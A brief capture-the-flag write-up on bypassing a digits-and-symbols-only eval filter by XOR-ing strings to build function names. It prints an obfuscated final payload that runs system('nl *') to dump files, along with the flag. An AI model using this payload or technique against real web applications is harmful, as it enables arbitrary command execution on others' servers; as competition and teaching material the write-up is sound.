The main idea was just inject only numbers and symbols. I found this similar CTF [https://ctftime.org/writeup/25520](http://)

So basically, we can input xor between number and symbol produce strings. Example `(('-6-**3')^('^'))` -> "s". Then create payload `system("nl *")` from the xor result

Final payload : `(('-6-**3')^('^'.('^'^'10').'^^'.('^'^'10').'^'))(('02~'^'^^^').'*')`

Flag : `KCTF{sHoUlD_I_uSe_eVaL_lIkE_tHaT}`